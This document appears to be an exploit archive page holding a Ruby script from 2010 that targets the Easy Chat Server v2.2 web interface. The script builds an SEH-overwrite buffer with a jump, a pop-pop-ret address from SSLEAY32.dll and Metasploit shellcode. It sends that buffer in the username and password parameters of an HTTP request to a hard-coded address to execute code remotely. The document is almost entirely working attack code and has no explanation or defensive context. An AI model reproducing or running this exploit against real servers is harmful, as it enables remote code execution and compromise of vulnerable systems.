1 #!/usr/bin/ruby
2 # Author: John Babio
3 # Tested on: [Windows XP Sp3 Eng]
4
5 require ’net/http’
6 require ’uri’
7 require ’socket’
8
9
10 jmp = "\xeb\x06\x90\x90"
11 ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret
12
13 #win32_exec − EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
14
15 shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
16 "\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
17 "\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
18 "\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
19 "\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
20 "\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
21 "\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
22 "\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
23 "\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
24 "\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"
25
26 buffer = "\x41" * 216 + jmp + ppr + shellcode
27
28 url = URI.parse(’http://10.10.99.12’)
29 res = Net::HTTP.start(url.host, url.port) {|http|
30 http.get(’/chat.ghp?username=’ +buffer+ ’&password=’ +buffer+ ’&room=1&sex=2’)
31 }
32 puts res.body
Page 1/1
Exploit EFS Software Easy Chat Server v2.2
John Babio
01/18/2010